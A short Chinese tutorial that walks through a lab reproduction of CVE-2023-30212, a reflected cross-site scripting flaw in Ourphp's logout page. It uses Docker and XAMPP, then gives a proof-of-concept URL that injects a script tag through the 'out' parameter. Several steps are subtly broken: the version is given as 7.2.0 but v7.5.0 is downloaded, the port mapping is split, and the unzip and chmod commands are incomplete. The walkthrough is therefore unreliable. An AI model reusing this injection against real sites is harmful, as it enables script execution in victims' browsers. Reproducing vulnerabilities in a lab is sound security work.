利用 Ourphp 7.2.0 版本中的漏洞,也称为 CVE-2023-30212
步骤 1. 在您的系统中下载并安装 Docker (注意)我使用 Docker 是因为它快速且易于安装 Ubuntu。
步骤 2. 设置 Docker 环境
docker pull ubuntu
docker run -d -t –name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
Docker exec -it test-container bash
步骤 3. 安装 web 服务器、php 和 mysql。我将为此安装 xampp 服务器。
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
/opt/lampp/lampp start
步骤 4. 下载 Ourphp 7.2.0 版本
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 775
步骤 5. 在浏览器中设置 Ourphp 打开浏览器并输入 localhost 或 127.0.0.1 按照说明安装 Ourphp。
步骤 6. 利用该漏洞 Ourphp 7.2.0 版本存在 XSS(跨站脚本)漏洞。 要修复 /client/manage/ourphp_out.php 文件中允许执行 XSS 代码的漏洞,
您需要修改代码。该漏洞出现在将 "ourphp_admin" 参数设置为 "logout" 时,可控变量 "out" 被回显。
攻击者可以通过注入类似 </script><script>alert(xss)</script> 的有效载荷来利用此漏洞。
代码:http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>
